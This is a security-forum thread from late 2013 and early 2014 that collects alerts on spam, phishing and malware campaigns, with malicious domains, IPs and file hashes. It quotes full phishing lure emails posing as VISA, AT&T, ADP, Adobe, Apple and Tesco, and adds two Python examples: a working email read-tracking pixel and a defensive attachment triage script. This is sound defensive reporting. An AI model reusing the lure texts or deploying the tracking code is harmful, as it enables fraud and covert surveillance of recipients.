"... over the past 90 days, 178 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-12-18, and the last time suspicious content was found was on 2013-12-18... Over the past 90 days, we found 25 site(s) on this network... appeared to function as intermediaries for the infection of 120 other site(s)... We found 16 site(s)... that infected 779 other site(s)..."
___

Fake ‘WhatsApp Missed Voicemail’ emails lead to pharmaceutical scams
- http://www.webroot.com/blog/2013/12/18/fake-whatsapp-missed-voicemail-themed-emails-lead-pharmaceutical-scams/
Dec 18, 2013 - "... A currently circulating fraudulent spam campaign is brand-jacking WhatsApp in an attempt to trick its users into clicking on links found in the email. Once socially engineered users fall victim to the scam, they’re automatically exposed to a fraudulent pharmaceutical site, offering them pseudo bargain deals...
Sample screenshot of the spamvertised email:
> https://www.webroot.com/blog/wp-content/uploads/2013/12/WhatsApp_Fake_Rogue_Fraudulent_Email_Spam_Pharma_Pharmaceutical_Scam_01.png
Sample screenshot of the landing pharmaceutical scam page:
> https://www.webroot.com/blog/wp-content/uploads/2013/12/WhatsApp_Fake_Rogue_Fraudulent_Email_Spam_Pharma_Pharmaceutical_Scam-1024x587.png
Redirection chain: hxxp :// 203.78.110.20 /horizontally.html -> hxxp ://viagraphysician .com (109.201.133.58). We’re also aware of... fraudulent domains that are known to have phoned back to the same IP (109.201.133.58)... Name servers:
ns1 .viagraphysician .com – 178.88.64.149
ns2 .viagraphysician .com – 200.185.230.32
... fraudulent name servers are also known to have participated in the campaign’s infrastructure at 178.88.64.149 ... We expect that more legitimate brands will continue getting targeted in such a way, with the fraudsters behind the campaign continuing to earn revenue through pharmaceutical affiliate programs..."
(More detail at the webroot URL above.)

- https://www.virustotal.com/en/ip-address/109.201.133.58/information/

- https://www.virustotal.com/en/ip-address/178.88.64.149/information/

- https://www.virustotal.com/en/ip-address/200.185.230.32/information/

- https://www.virustotal.com/en/ip-address/203.78.110.20/information/
___

Gmail’s Image Display defaults may change your Privacy
- http://blog.trendmicro.com/trendlabs-security-intelligence/changes-to-gmails-image-display-defaults-may-change-your-privacy/
Dec 18, 2013 - "... this means that all pictures in emails will now be automatically displayed. Instead of being served directly from the site hosting the image, however, they will be given a copy that has been scanned by Google. Officially, the stated rationale for this change is that previously, senders “might try to use images to compromise the security of your computer”, and that with the change images will be “checked for known viruses or malware”. This change affects users who access Gmail via their browser, or the official iOS and Android apps. In the past, there have been occasions where malicious images were used to compromise computers. A number of image formats were exploited in 2005 and 2006, including a Windows Metafile vulnerability (MS06-001), and an Office vulnerability that allowed arbitrary code execution (MS06-039). More recently, a vulnerability in how TIFF files were handled (MS13-096) was found and not patched until the December Patch Tuesday cycle. Properly implemented, scanning the images would be able to prevent these attacks from affecting users... actual exploitation of these vulnerabilities has been relatively uncommon. Exploit kits have opted to target vulnerabilities in Flash, Internet Explorer, Java, and Reader instead. Image vulnerabilities are not even listed in the control panels of these kits. The primary reason to block images is not to block malware, but to stop information leakage. Images are used by spammers and attackers to track if/when email has been read and to identify the browser environment of the user. Email marketers also use this technique to check how effective their email campaigns are. Email marketers have already confirmed that in spite of Google’s moves, email tracking is still very possible. Google’s proposed solution (a web proxy that checks images for malware) appears to solve a small security problem (malicious image files), while leaving users’ security and privacy at risk.
Attackers still have the capability to track that users have read email–and to learn aspects of their browser environment. Users can still revert to the previous behavior via their Gmail settings, as outlined in Google’s blog post:
Of course, those who prefer to authorize image display on a per message basis can choose the option “Ask before displaying external images” under the General tab in Settings. That option will also be the default for users who previously selected “Ask before displaying external content”.
We -strongly- recommend that users -change- this setting for their accounts. Users who access Gmail via POP3 or IMAP should check the settings of their mail application to control the display of images."
___

Fake VISA Report SPAM / payment-history-n434543-434328745231.zip
- http://blog.dynamoo.com/2013/12/visa-recent-transactions-report-spam.html
18 Dec 2013 - "This -fake- VISA spam comes with a malicious attachment:
Date: Wed, 18 Dec 2013 14:32:50 -0500 [14:32:50 EST]
From: Visa [Eddie_Jackson@ visa .com]
Subject: VISA - Recent Transactions Report
Dear Visa card holder,
A recent review of your transaction history determined that your card was used in
possible fraudulent transactions. For security reasons the requested transactions were
refused. Please carefully review electronic report for your VISA card.
For more details please see the attached transaction report.
Virgie_Cruz
Data Protection Officer
VISA EUROPE LIMITED
1 Sheldon Square
London W2 6WH
United Kingdom ...

Attached to the message is an archive file payment-history-n434543-434328745231.zip with a VirusTotal detection rate of 10/48*, which in turn contains payment-history-n434543-434328745231.exe with a detection rate of 10/49**. Automated analysis tools... indicate a network connection to bestdatingsitesreview4u .com on 38.102.226.126 (PSInet, US). This appears to be the only site on that server; blocking either the IP or domain temporarily may help mitigate against infection."
* https://www.virustotal.com/en/file/fd5451a5d4731ae279fcc5cdad37ec4f76e81957f9be643fd0934d67cba387ac/analysis/1387397621/

** https://www.virustotal.com/en/file/c7172701eeb5bfaa15acf865a6ff80b2c01fc437072f644b768386a23f262127/analysis/1387397396/

- https://www.virustotal.com/en/ip-address/38.102.226.126/information/

:mad: :fear: :sad:
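An added example, not code from the Trend Micro post or from this forum: the read-tracking mechanism the post describes, written out end to end so the privacy point is concrete. The sender embeds a per-recipient image URL; whoever fetches it (the recipient's client, or an image proxy fetching on the recipient's behalf) confirms that the mail was rendered. A proxy hides the recipient's browser details, but not the fact of the open. The tracking host, the HMAC secret and the "GoogleImageProxy" User-Agent marker are assumptions for the demonstration, and the request headers are constructed.

```python
import base64
import hashlib
import hmac
from urllib.parse import parse_qs, urlparse

# Assumed values for this example: a sender-side secret and a tracking host.
SECRET = b"example-campaign-secret"
PIXEL_HOST = "https://track.example.invalid/open.gif"
TAG_LEN = 16
# Assumed marker: the proxy identifies itself in the User-Agent it sends.
PROXY_UA_MARKERS = ("GoogleImageProxy",)


def make_token(campaign_id, recipient):
    """Opaque token binding campaign and recipient, HMAC-tagged so it cannot be forged or edited."""
    msg = f"{campaign_id}|{recipient}".encode()
    tag = hmac.new(SECRET, msg, hashlib.sha256).digest()[:TAG_LEN]
    return base64.urlsafe_b64encode(msg + tag).decode().rstrip("=")


def pixel_url(campaign_id, recipient):
    """The per-recipient <img src> the sender embeds in the mail body."""
    return f"{PIXEL_HOST}?t={make_token(campaign_id, recipient)}"


def parse_token(token):
    """Server side: recover (campaign_id, recipient), or None if the tag does not verify."""
    raw = base64.urlsafe_b64decode(token + "=" * (-len(token) % 4))
    if len(raw) <= TAG_LEN:
        return None
    msg, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    expected = hmac.new(SECRET, msg, hashlib.sha256).digest()[:TAG_LEN]
    if not hmac.compare_digest(tag, expected):
        return None
    campaign_id, _, recipient = msg.decode().partition("|")
    return campaign_id, recipient


def record_open(request_url, headers, log):
    """What a single GET of the pixel tells the sender; appends an entry to log and returns it."""
    token = parse_qs(urlparse(request_url).query).get("t", [None])[0]
    ident = parse_token(token) if token else None
    if ident is None:
        return None
    ua = headers.get("User-Agent", "")
    via_proxy = any(marker in ua for marker in PROXY_UA_MARKERS)
    entry = {
        "campaign": ident[0],
        "recipient": ident[1],
        "opened": True,  # the fetch itself proves the mailbox is live and the mail was rendered
        "via_proxy": via_proxy,
        "client_ua": None if via_proxy else ua,  # a proxy hides the real client, nothing more
    }
    log.append(entry)
    return entry


def demo():
    """Same pixel fetched directly and through a proxy: both fetches confirm the open."""
    url = pixel_url("xmas2013", "alice@example.invalid")
    log = []
    # Constructed request headers, one direct and one via an image proxy.
    record_open(url, {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0"}, log)
    record_open(url, {"User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)"}, log)
    return log


if __name__ == "__main__":
    for entry in demo():
        print(entry)
```

The only setting that removes the leak is the one the post recommends: not fetching external images until the user asks for them, since a fetch that never happens cannot be logged.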

AplusWebMaster
2013-12-19, 19:20
FYI...

Fake Voicemail SPAM - from "Elfin Cars Sports"
- http://blog.dynamoo.com/2013/12/new-voicemail-message-from-elfin-cars.html
19 Dec 2013 - "This -fake- voicemail message from "Elfin Cars Sports" has a malicious attachment:
Date: Thu, 19 Dec 2013 08:36:56 -0600 [09:36:56 EST]
From: Voice Mail [noreply@ spamcop .net]
Subject: New Voicemail Message
New Voicemail Message
You have been left a 1:02 long message (number 1) in mailbox from "Elfin Cars Sports"
07594434593, on Thursday, December 19, 2013 at 07:20:02 AM
The voicemail message has been attached to this email - which you can play on most
computers...

The attachment is VoiceMail.zip with a VirusTotal detection rate of 9/49*, which in turn contains a malicious executable VoiceMail.exe with an icon to make it look like an audio file, and this also has a detection rate of 9/49** (but with slightly different detections). Automated analysis tools... show an attempted connection to plantautomation-technology .com on 216.151.164.211 (NJ Tech Solutions, US) and anuudyog .com on 66.7.149.156 (Web Werks, US)."
* https://www.virustotal.com/en-gb/file/c9705f38f51fa419ec3f59421aeee7f27c89b7b45a5088c141326f19adc0480a/analysis/1387465669/

** https://www.virustotal.com/en-gb/file/d2e63c058e914b511d6f33960f0a031d623fb83341dd4c0cfec555de732e44bf/analysis/1387465683/
___

Fake Navy Federal Credit Union Phish
- http://threattrack.tumblr.com/post/70485890383/navy-federal-credit-union-phish
Dec 19, 2013 - "Subjects Seen:
NAVY FEDERAL Credit Union
Typical e-mail details:
We recently reviewed your account, and we suspect an unauthorized ATM-based transactions on your account access. Our banking service will help you to avoid frequently fraud transactions and to keep your savings and investments confidential.
To ensure that your account is not compromised please login to NAVY Account Access by clicking this link, verify and update your profile and your current account access will be 128-bit encrypted and guard by our security system.
- Click Here to login your Federal Credit Union Account
- Enter your Account Access details
- Verify and update with NAVY FEDERAL
Thank you for using F.C.U Account Access Security

Malicious URLs:
holidayindingle .com/wp-admin/css/colors/blue/gos/
80.93.29.195
- https://www.virustotal.com/en/ip-address/80.93.29.195/information/

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/60c69283a087981d79c8ee5168829d36/tumblr_inline_my234zcEAF1r6pupn.png

Tagged: Navy Federal Credit Union, phish
___

AT&T Voicemail Message Spam
- http://threattrack.tumblr.com/post/70498350698/at-t-voicemail-message-spam
Dec 19, 2013 - "Subjects Seen:
AT&T - You Have a new Voice Mail
Typical e-mail details:
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
The length of transmission was 25 seconds.
Thank you,
AT&T Online Services

Malicious File Name and MD5:
VoiceMail.zip (BE7D2F4179D6D57827A18A20996A5A42)
VoiceMail.exe (D1CA2DC1B6D1C8B32665FCFA36BE810B)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/6d1b214f58019207207945b6f0c1372d/tumblr_inline_my2cl9aSPC1r6pupn.png

Tagged: AT&T, Upatre
___

Fake emails regarding license key from Adobe - trojan
- http://blog.mxlab.eu/2013/12/19/trojan-attached-in-fake-emails-regarding-license-key-from-adobe/
Dec 19, 2013 - "... new trojan distribution campaign by email with the following subjects:
Download your adobe software
Download your license key
Thank you for your order
Your order is processed
This email is sent from the spoofed address “Adobe Software <soft@ adobes .com>”, “Adobe Software <support@ adobes .com>”, “Adobe <software@ adobes .com>”, “Adobe Software <your_order@ adobes .com>” or similar and has the following body:
Hello.
Thank you for buying Director 11.5 software.
Your Adobe License key is in attached document below.
Adobe Systems Incorporated.
Hello.
Thank you for buying Creative Suite 6 Master Collection software.
Your Adobe License key is in attached document below.
Adobe Systems Incorporated.
Order Notification.
Thank you for buying Adobe Connect software.
Your Adobe License key is in attached document below.
Adobe Systems Incorporated.
The attached ZIP file has the name License_Key_OR8957.zip and contains the 209 kB large file License_Key_Document_Adobe_Systems_Incorporated.exe. The trojan is known as Win32:Malware-gen, W32/Trojan.BDDH-7155, W32/Trojan3.GVP, Trojan-Downloader.Win32.Dofoil.rqh or Artemis!30AAE526F5C4. At the time of writing, 11 of the 45 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/a6cb6905775a7c4995222b3d91e7513a405d0cd183b7106dd713e720b2a4762a/analysis/1387485019/

Alert: Adobe License Key Email Scam
- http://blogs.adobe.com/psirt/2013/12/20/alert-adobe-license-key-email-scam/
Dec 20, 2013 - "Adobe is aware of reports that a phishing campaign is underway involving malicious emails purporting to deliver license keys for a variety of Adobe offerings. Customers who receive one of these emails should -delete- it immediately without downloading attachments or following hyperlinks that may be included in the message..."

:mad: :fear:

AplusWebMaster
2013-12-20, 19:24
FYI...

Fake ADP Fraud Secure Update Spam
- http://threattrack.tumblr.com/post/70587915512/adp-fraud-secure-update-spam
Dec 20, 2013 - "Subjects Seen:
ALERT! From ADP: 2013 Anti-Fraud Secure Update
Typical e-mail details:
Dear Valued ADP Client,
We are pleased to announce that ADP Payroll System released secure upgrades to your computer.
A new version of secure update is available.
Our development division strongly recommends you to download this software update.
It contains new features:
The certificate will be attached to the computer of the account holder, which disables any fraud activity
Any irregular activity on your account is detected by our safety centre. Download the attachment. Update will be automatically installed by double click.
We value our partnership with you and take pride in the confidence that you place in us to process payroll
on your behalf. As always, your ADP Service Team is happy to assist with any questions you may have.

Malicious File Name and MD5:
2013 Anti-Fraud Secure Update.zip (EFF54DFFF096C439D07B50A494D6B435)
2013 Anti-Fraud Secure Update.exe (D4CBC4F2BE31277783F63B3991317AFE)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/206afa7c773e9cb15ab7c24bf8116ac4/tumblr_inline_my41kdEEtA1r6pupn.png

Tagged: ADP, Upatre
___

Fake Dept. of Treasury - Notice of Outstanding Obligation Spam
- http://threattrack.tumblr.com/post/70597137872/department-of-treasury-notice-of-outstanding-obligation
Dec 20, 2013 - "Subjects Seen:
Department of Treasury Notice of Outstanding Obligation - Case L3FY2OH7CD1N9OS
Typical e-mail details:
Important please review and sign the attached document!
We have received notification from the Department of the Treasury,
Financial Management Service (FMS) that you have an outstanding
obligation with the Federal Government that requires your immediate
attention.
In order to ensure this condition does not affect any planned
contract or grant activity, please review and sign the attached document and if
you are unable to understand the attached document please call FMS at 1-800-304-3107
to address this issue. Please make sure the person making the telephone call has the
Taxpayer Identification Number available AND has the authority/knowledge
to discuss the debt for the contractor/grantee.

Malicious File Name and MD5:
FMS-Case-L3FY2OH7CD1N9OS.zip (D82A734CC165A85D1C19C65A6A9EA2A7)
FMS-.exe (167744869CBD5560810B7CF2A03BD6FF)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c9ca0241c01bd51afa7ee8985765bc24/tumblr_inline_my47ubkkd51r6pupn.png

Tagged: Upatre, Department of Treasury
___

Fake AT&T voicemail - malware...
- http://www.hoax-slayer.com/atandt-new-voice-mail-malware.shtml
Dec 20, 2013 - "... Message purporting to be from telecommunications company AT&T claims that a new voicemail could not be delivered to the recipient. The email includes an attached file that supposedly contains the voicemail.
Analysis: The message is not from AT&T and the attached file does not contain a missed voicemail. Instead, the attachment harbours a malicious .exe file hidden within a .zip file. Opening the .exe file can install malware on the user's computer...
> http://www.hoax-slayer.com/images/atandt-new-voice-mail-malware-1.jpg
This attack is similar to another malware distribution that claims that WhatsApp users have a new voicemail waiting. Clicking the "Play" button in the -bogus- email will open a malicious website that harbours malware..."

:fear: :mad:

AplusWebMaster
2013-12-23, 20:33
FYI...

Fake QuickBooks SPAM / Invoice.zip
- http://blog.dynamoo.com/2013/12/quickbooks-spam-invoicezip.html
23 Dec 2013 - "This -fake- QuickBooks spam has a malicious attachment:
Date: Mon, 23 Dec 2013 07:54:35 -0800 [10:54:35 EST]
From: QuickBooks Invoice [auto-invoice@ quickbooks .com]
Subject: Important - Payment Overdue
Please find attached your invoices for the past months. Remit the payment by 12/23/2013 as outlines under our "Payment Terms" agreement.
Thank you for your business,
Sincerely,
Randal Owen ...

Attached to the message is a file Invoice.zip which has a VirusTotal detection rate of 5/44*, which in turn contains a malicious executable Invoice.exe with a detection rate of 5/49**. Automated analysis... shows an attempted connection to wifordgallery .com on 174.127.73.250 (Hosting Services Inc, US); it appears to be the only domain on that server, so blocking the IP or domain itself may give you some protection against this current run of malware."
* https://www.virustotal.com/en-gb/file/f699d5ff02ea67276220385c5d6335ee8005f9ab30a0da82cde592e83e7f7595/analysis/1387814800/

** https://www.virustotal.com/en-gb/file/200f56fec7d3b793662ad9481f153f80cc79bc0f76ba999b8f5c24cea1ee9d88/analysis/
___

More Email scams, spam...
- https://isc.sans.edu/diary.html?storyid=17276
Last Updated: 2013-12-23 20:27:58 - "... new wave of email making the rounds, with a message that looks as follows:
> https://isc.sans.edu/diaryimages/images/c1.jpg
... The subject seems to be one of "Delivery Canceling", "Express Delivery Failure" or "Standard Delivery Failure". Next to Costco, the same scam is currently ongoing for BestBuy and Walmart, maybe others. The links are (appear to be) random or encoded, there is no repeat occurrence of the URL and "package number" for the entire sample set that we have. It could well be that the BASE64 portion of the URL contains an encoded hash of the email address to which the phish was sent, so when you play with one of the samples, be mindful that you could be confirming the email address back to the bad guys... For a change, clicking on the link doesn't bring up a web form asking for your credit card number. Instead, it quite bluntly downloads a ZIP which contains an EXE. What makes this particular version more cute than others is that the EXE inside the ZIP is re-named on the fly, based on the geolocation of your download request. In my case, this spoiled the fun some, because "CostcoForm_Zürich.exe" and "CostcoForm_Hamburg.exe" didn't look all that credible: There are no Costcos in Switzerland or Germany :) ... As for the malware: Lowish detection as usual, Virustotal 12/44*. Malwr/Cuckoo analysis**. The malware family so far seems to have a MUTEX of "CiD0oc5m" in common, and when run, it displays a Notepad that asks the user to try again later (while the EXE installs itself in the background)... Hosts currently seen pushing the malware include:
bmaschool .net Address: 61.47.47.35
bright-color .de Address: 78.46.149.229
am-software .net Address: 64.37.52.95
artes-bonae .de Address: 81.169.145.149
automartin .com Address: 46.30.212.214
almexterminatinginc .com Address: 50.63.90.1
brandschutz-poenitz .de Address: 81.169.145.160
All these sites have been on the corresponding IP addresses for years, which suggests that these are legitimate web sites that have been compromised/hacked, and are now being abused to push malware..."
* https://www.virustotal.com/en/file/f80c9b51c6357ca07f7204ab5a60b3912180103ac64e6dfaf15e6dc9481a028d/analysis/1387825985/

** https://malwr.com/analysis/MjUxNzExNGIwMTJkNGY4MThiMTI0MTJlMWRjYmM0NzU/
"... Hosts: IP 95.101.0.114 ..."
- https://www.virustotal.com/en/ip-address/95.101.0.114/information/

Keywords: malware scam
___

Fake Court hearing SPAM - Court_Notice_Jones_Day_Wa#8127.zip
- http://blog.dynamoo.com/2013/12/hearing-of-your-case-in-court-nr6976.html
23 Dec 2013 - "... malicious attachment:
Date: Mon, 23 Dec 2013 10:05:38 -0500 [10:05:38 EST]
From: Notice to Appear [support.6@ jonesday .com]
Subject: Hearing of your case in Court NR#6976
Notice to Appear,
Hereby you are notified that you have been scheduled to appear for
your hearing that
will take place in the court of Washington in January 9, 2014 at 10:00
am.
Please bring all documents and witnesses relating to this case with
you to Court on your hearing date.
The copy of the court notice is attached to this letter.
Please, read it thoroughly.
Note: If you do not attend the hearing the judge may hear the case in
your absence.
Yours truly,
Alison Smith
Clerk to the Court.

There is an attachment Court_Notice_Jones_Day_Wa#8127.zip which in turn contains an executable Court_Notice_Jones_Day_Washington.exe which is presumably malicious, but I can't analyse it. The VirusTotal detection rate for the ZIP is 4/49*."
* https://www.virustotal.com/en-gb/file/0067a31360bda03b85ceac1df405bd073cb86d9fdd6b6f9c5529bf77a160dac7/analysis/1387815631/

Same stuff D.D.: https://isc.sans.edu/diary.html?storyid=17279
Last Updated: 2013-12-24 00:54:04
Keywords: scam spam malware

:fear::mad:

AplusWebMaster
2013-12-30, 13:43
FYI...

Fake Apple reactivation email - phishing attempt
- http://blog.mxlab.eu/2013/12/30/reactivation-email-from-service-apple-is-fake-and-contains-a-phishing-attempt/
Dec 30, 2013 - "MX Labs... intercepted a phishing email from the spoofed email address “Service Apple <client@ apple .com>” with the subject “Reactivation No: A3556P325LL346E?” and the following body:
Dear (e) client (e)
We inform you that your account is about to expire in less than 48 hours, it is imperative to conduct an audit of your information now, otherwise your account will be deleted.
Download the attached form and open it in your browser and make your request.
Why you email he sent?
The sending of this email applies when the date of expiration of your account will terminate.
Thank you,
Assistance Apple customers

Screenshot: http://img.blog.mxlab.eu/2013/20131230_apple_phish_1.gif

The email comes with the attachment Apple.html. Once opened you will have the following screen:
> http://img.blog.mxlab.eu/2013/20131230_apple_phish_2.gif
The HTML page contains code to use an -iframe- and the real web form is hosted on hxxp ://photosappl.bbsindex .com:89/apple .com/ca/index.html.
Once all the details are filled in, the user is -redirected- to the official log in page of Apple at https ://secure2.store.apple .com/es/sign_in/."
___

Fake Tesco phish ...
- http://www.welivesecurity.com/2013/12/30/phishing-for-tesco-shoppers/
Dec 30, 2013 - "... -scam- message again, just for comparison.
Dear Valued Customer,
NatWest is giving out free shopping vouchers for your favorites stores for Christmas.
This offer is only for NatWest Credit Card Online Services users and it will be valid to use until the 31st of December, 2013
To Qualify for this opportunity, Kindly Click here now.
After validation your voucher will be sent via text message or posted to your Mailbox.
Yours Sincerely,
NatWest Credit Card Services.

The example below – with the subject header “Free Tesco Vouchers for Christmas.” – is a little more sophisticated. For a start, it has the festive Tesco Bank logo currently in use, complete with Google-ish party hat on the ‘O’. And since TESCO is probably better known for its supermarkets than for its banking and insurance services, even to people who never use it, it’s rather more credible that the bank might be offering vouchers for Tesco stores, rather than the vague and ungrammatical ‘your favorites stores’...
> http://www.welivesecurity.com/wp-content/uploads/2013/12/tesco-logo.png
Dear Valued Customer,
Tesco Bank is giving you a chance to shop for free at any of our tesco outlets or online by giving out free tesco vouchers for Christmas.
This offer is only for Tesco Credit Card and Tesco Savings/Loan owners and it will be valid to use until the 31st of December,2013.
SAVINGS OR LOAN CUSTOMER CLICK THE LINK BELOW
Savings/Loan Click here to Claim
CREDIT CARD CUSTOMER CLICK THE LINK BELOW
Credit Card Click here to Claim
After validation your voucher will be sent via text message or posted to your Mailbox.
Tesco Personal Finance Online Service

Most bank phishing messages come in waves/campaigns, and they’re not particularly topical. The scammers keep sending out material that falls into one of the same set of social engineering categories... While they want you to respond immediately (before you have time to think about it, and before the link disappears because security researchers have found it and taken action), the content isn’t particularly topical. This one, however, resembles the sort of topical approach we associate with other kinds of malicious activity (botnets, fake AV, charity/disaster relief scams and so on) where social engineering is based on a current seasonal event (Xmas, Valentine’s Day, Cyber Monday) or news item (real or fake)..."
___

Snapchat security issues ...
- http://www.darkreading.com/vulnerability/researchers-reveal-snapchat-security-iss/240165041?printer_friendly=this-page
Dec 27, 2013 - "Snapchat, the popular photo messaging service, got a visit from the privacy Grinch this Christmas season after researchers released details of an exploit that abuses Snapchat's "Find My Friends" feature. The visit was the work of Gibson Security*, which first notified Snapchat of this and other security issues back in August. According to the group, Snapchat did not respond, compelling Gibson Security to publicly release more details and some proof-of-concept code on Christmas Eve. The first target: Snapchat's Find My Friends feature. Typically, Find My Friends enables users to look up their friends' usernames by uploading the phone numbers in their devices' address book and searching for accounts that match those numbers. The researchers, however, were able to abuse that capability to do that on a massive scale... researchers say an attacker could use the Snapchat API to write an automated program that generates phone numbers and searches them against the Snapchat database as a step toward building a database of social networking profiles that could be sold to others..."
* http://gibsonsec.org/

:fear: :mad:
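An added example, not code from any of the quoted sources or from this forum: a small Python triage script for the two attachment patterns these posts keep describing. One is a ZIP wrapping an .exe (the voicemail, QuickBooks, court-notice and ADP runs above, where the executable carries an icon or name chosen to look like a document or audio file); the other is an HTML attachment whose real content is pulled into an iframe from another host, as in the Apple "reactivation" phish, where the form sat on a non-standard port. The script judges ZIP members by their MZ header rather than by their name, and reports where an HTML attachment loads content from. The sample message, member names and .invalid hosts are constructed for the demonstration.

```python
import email
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

PE_MAGIC = b"MZ"
EXEC_EXTS = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs")


class _RefExtractor(HTMLParser):
    """Collect where an HTML attachment sends the browser: iframe src and form action."""
    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" and a.get("src"):
            self.refs.append(("iframe", a["src"]))
        elif tag == "form" and a.get("action"):
            self.refs.append(("form", a["action"]))


def triage_zip(data):
    """Judge ZIP members by content (MZ header), not by the name the sender chose."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as member:
                head = member.read(2)
            name = info.filename
            is_pe, exec_ext = head == PE_MAGIC, name.lower().endswith(EXEC_EXTS)
            if is_pe and not exec_ext:
                findings.append(f"zip member {name!r}: PE executable disguised with a non-executable name")
            elif is_pe:
                findings.append(f"zip member {name!r}: PE executable (MZ header)")
            elif exec_ext:
                findings.append(f"zip member {name!r}: executable extension")
    return findings


def triage_html(text):
    """Flag HTML that fetches its real content or posts credentials elsewhere."""
    parser = _RefExtractor()
    parser.feed(text)
    findings = []
    for kind, target in parser.refs:
        u = urlparse(target)
        if u.scheme not in ("http", "https") or not u.hostname:
            continue
        reasons = []
        if u.port not in (None, 80, 443):
            reasons.append(f"non-standard port {u.port}")
        if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", u.hostname):
            reasons.append("raw IP host")
        detail = f" ({', '.join(reasons)})" if reasons else ""
        findings.append(f"html {kind} loads {u.hostname}{detail}")
    return findings


def triage_message(raw):
    """Walk the attachments of one RFC 822 message and return human-readable findings."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        fname = part.get_filename() or "<unnamed>"
        payload = part.get_payload(decode=True) or b""
        if payload[:2] == b"PK":
            try:
                findings += [f"{fname}: {f}" for f in triage_zip(payload)]
            except zipfile.BadZipFile:
                findings.append(f"{fname}: claims to be a ZIP but is not a valid archive")
        elif payload[:2] == PE_MAGIC:
            findings.append(f"{fname}: bare PE executable")
        elif part.get_content_type() == "text/html" or fname.lower().endswith((".htm", ".html")):
            findings += [f"{fname}: {f}" for f in triage_html(payload.decode("utf-8", "replace"))]
    return findings


def build_sample_message():
    """Constructed sample mail (not a captured one): a ZIP with a fake VoiceMail.exe plus an iframe page."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("VoiceMail.exe", PE_MAGIC + b"\x00" * 62)  # MZ header only, not a real program
        zf.writestr("readme.txt", b"nothing to see")
    html = ('<html><body><iframe src="http://photosappl.example.invalid:89/apple.com/ca/index.html" '
            'width="100%" height="100%"></iframe></body></html>')
    msg = EmailMessage()
    msg["From"] = "Voice Mail <noreply@example.invalid>"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "New Voicemail Message"
    msg.set_content("The voicemail message has been attached to this email.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="VoiceMail.zip")
    msg.add_attachment(html.encode(), maintype="text", subtype="html", filename="Apple.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for line in triage_message(build_sample_message()):
        print(line)
```

Checking the first two bytes of each member is deliberate: the ZIP is the only layer the mail gateway sees, and the posts above show detection rates of 4 to 12 engines out of ~49 for these samples, so a content check that does not depend on a signature is worth having at the gateway.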

AplusWebMaster
2014-01-02, 22:30
FYI...

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Deposit Statement Email Messages - 2014 Jan 02
Fake Business Complaint Notification Email Messages - 2014 Jan 02
Fake Personal Picture Email Messages - 2014 Jan 02
Fake Hotel Reservation Request Email Messages - 2014 Jan 02
Fake Account Payment Information Email Messages - 2014 Jan 02
Fake Product Purchase Request Email Messages - 2014 Jan 02
Fake Online Purchase Email Messages - 2014 Jan 02
Fake Account Information Request Email Messages - 2014 Jan 02
Fake Payment Notification - 2014 Jan 02
Fake Job Offer Documents Email Messages - 2014 Jan 02
Fake Account Refund Email Messages - 2014 Jan 02
Fake Court Appearance Request Email Messages - 2014 Jan 02
Fake Product Order Email Messages - 2014 Jan 02
(More detail and links at the cisco URL above.)

:mad: :sad:

AplusWebMaster
2014-01-03, 23:29
FYI...

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Email Messages with Malicious Images - 2014 Jan 03
Fake Financial Document Delivery Email Messages - 2014 Jan 03
Fake Product Order Inquiry Email Messages - 2014 Jan 03
Fake Court Hearing Documents Email Messages - 2014 Jan 03
Fake Product Purchase Order Email Messages - 2014 Jan 03
Fake Shipping Information Email Messages - 2014 Jan 03
Fake Payroll Invoice Email Messages - 2014 Jan 03
Fake Bank Transfer Notification Email Messages - 2014 Jan 03
Fake Account Bill Statement Email Messages - 2014 Jan 03
Fake Court Appearance Request Email Messages - 2014 Jan 03
Fake Financial Report Email Messages - 2014 Jan 03
Fake Order Details Email Messages - 2014 Jan 03
Fake Invoice Statement Attachment Email Messages - 2014 Jan 03
Fake Account Payment Confirmation Email Messages - 2014 Jan 03
Fake Personal Photos Email Messages - 2014 Jan 03
Fake Online Order Details Email Messages - 2014 Jan 03
Fake Document Delivery Email Messages - 2014 Jan 03
Fake Court Documents Email Messages - 2014 Jan 03
Fake Services Invoice Email Messages - 2014 Jan 03
(More detail and links at the cisco URL above.)

:mad: :fear:

AplusWebMaster
2014-01-04, 16:22
FYI...

Malicious Ads from Yahoo
- https://isc.sans.edu/diary.html?storyid=17345
Last Updated: 2014-01-04 13:49:34 UTC - "According to a blog post from fox-it.com*, they found ads.yahoo .com serving malicious ads from Yahoo's home page as early as December 30th. The malicious traffic appeared to come from the following subnets 192.133.137.0/24 and 193.169.245.0/24. Most infections seem to be in Europe. Yahoo appears to be aware and addressing the issue, according to the blog..."
* http://blog.fox-it.com/2014/01/03/malicious-advertisements-served-via-yahoo/
